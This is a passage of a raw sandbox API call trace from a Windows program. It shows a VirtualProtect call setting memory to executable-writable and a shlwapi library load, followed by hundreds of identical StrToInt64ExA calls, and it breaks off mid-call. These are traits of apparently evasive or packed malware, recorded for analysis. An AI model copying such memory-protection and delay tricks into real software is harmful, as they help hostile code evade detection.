DllHandle=0x18fe70 | out: DllHandle=0x18fe70*=0x765b0000) returned 0x0 [0012.910] VirtualProtect (in: lpAddress=0x4070a1, dwSize=0x4800, flNewProtect=0x40, lpflOldProtect=0x18fe8c | out: lpflOldProtect=0x18fe8c*=0x80) returned 1 [0012.911] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77100000 [0012.911] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.911] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.912] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.912] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.912] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.912] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.913] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.913] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.913] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.913] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.914] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.914] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.914] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.914] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.915] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.915] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.915] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.915] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.916] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.916] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.916] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.916] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.916] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.917] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.917] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.917] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.917] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.918] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.918] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.918] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.918] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.919] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.919] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.919] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.919] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.920] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.920] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.920] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.921] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.921] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.921] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.922] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.922] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.923] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.923] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.923] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.924] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.924] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.924] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.925] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.925] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.925] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.926] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.926] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.926] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.926] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.927] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.927] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.927] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.928] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.928] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.928] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.929] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.929] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.929] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.929] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.930] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.930] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.930] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.931] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.931] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.931] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.932] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.932] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.932] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.933] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.933] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.933] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.933] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.934] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.934] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.934] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.935] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.935] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.935] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.935] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.936] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.936] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.936] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.937] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.937] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.937] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.937] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.938] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.938] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.938] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.938] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.939] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.939] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.939] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.940] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.940] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.940] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.941] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.941] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.941] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.941] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.942] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.942] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.942] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.942] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.943] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.943] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.943] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.943] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.944] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.944] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.944] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.944] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.945] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.945] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.945] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.945] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.946] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.946] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.946] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.946] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.947] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.947] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.947] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.947] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.948] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.948] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.948] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.948] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.949] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.949] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.949] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.949] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.950] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.950] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.950] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.950] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.951] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.951] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.951] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.951] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.952] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.952] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.952] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.952] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.953] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.953] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.953] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.953] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.954] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.954] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.954] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.954] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.955] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.955] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.955] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.955] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.956] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.956] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.956] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.956] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.957] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.957] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.957] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.957] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.958] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.958] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.958] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.958] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.959] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.959] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.959] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.959] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.960] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.960] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.960] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.961] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.961] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.961] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.962] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.962] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.962] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.963] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.963] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.963] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.964] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.964] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.964] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.965] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.965] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.965] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.966] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.966] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.966] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.966] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.967] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.967] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.967] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.968] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.968] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.968] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.968] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.969] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.969] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.970] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.971] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.971] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.971] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.972] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.972] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.972] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.973] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.973] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.973] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.973] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.974] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.974] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.974] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.974] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.975] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.975] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.975] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.975] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.976] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.976] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.976] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.976] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.977] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.977] StrToInt64ExA (in: pszString="0x35174", dwFlags=0x1, pllRet=0x0 | out: pllRet=0x0) returned 1 [0012.977] StrToInt64ExA 